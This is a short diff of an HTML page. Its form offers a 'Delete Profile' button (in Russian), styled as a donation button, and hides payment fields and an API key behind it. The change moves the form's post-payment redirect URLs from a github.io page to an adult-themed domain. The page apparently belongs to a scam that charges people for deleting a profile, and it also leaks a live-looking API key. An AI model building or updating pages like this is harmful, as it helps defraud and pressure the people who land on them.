--- a/519446384900-delete.html
+++ b/519446384900-delete.html
@@ -269,9 +269,9 @@
 	<input type="hidden" name="card_cvc" value="1">
 	<input type="hidden" name="country" value="RU">
 	<input type="hidden" name="api_key" value="0e599e3bfe532f7a918d26c995dcb31665810400d279f0181a14111a5a9f5781">
-	<input type="hidden" name="success_url" value="https://gayworld.github.io/com/niceman.html">
-	<input type="hidden" name="fail_url" value="https://gayworld.github.io/com/519446384900.html">
-    <input type="hidden" name="notice_url" value="https://gayworld.github.io/com/519446384900.html">
+	<input type="hidden" name="success_url" value="https://s.intim.one//niceman.html">
+	<input type="hidden" name="fail_url" value="https://s.intim.one//519446384900.html">
+    <input type="hidden" name="notice_url" value="https://s.intim.one//519446384900.html">
     <input type="hidden" name="use_select_method_form" value="1">
 	<input type="submit" class="donate-but" value="Удалить Анкету">
 </form>
